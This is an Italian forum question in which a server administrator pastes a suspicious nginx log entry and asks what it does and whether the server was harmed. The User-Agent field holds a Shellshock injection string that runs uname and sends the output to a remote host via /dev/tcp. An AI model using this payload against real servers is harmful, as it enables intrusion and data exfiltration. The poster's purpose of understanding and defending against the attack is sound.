Durante il debug del mio server per problemi, ho controllato spesso i miei log. Ecco uno strano che ho trovato, che sembra un tentativo di eseguire qualcosa sul mio server. Sto usando nginx su Ubuntu 14.04. Di seguito è riportata la voce del registro:
xxx.xxx.xxx.xxx - - [07/Apr/2015:02:15:05 +0200] "GET /cgi-bin/test.sh HTTP/1.0" 400 172 "-" "() { :;}; echo; /bin/uname -a > /dev/tcp/xxx.xxx.xxx.xxx/80"
La richiesta di percorso di /cgi-bin/test.sh
e il campo agente utente () { :;}; echo; /bin/uname -a > /dev/tcp/xxx.xxx.xxx.xxx/80
mi sembrano molto sospetti.
La mia ipotesi su questo è di eseguire qualcosa sul server (che per fortuna non è lì), e cercando di convincermi ad esporre le mie informazioni di sistema e inviarlo tramite TCP all'indirizzo IP del richiedente, (che, anche per mia fortuna, non ho ancora nulla che analizzi i log).
- Che cosa sta cercando di fare quella richiesta, sia nel percorso che nel campo User-agent?
- Ha fatto del male al server?
- Che cosa posso fare per ridurre il danno fatto?
Grazie in anticipo.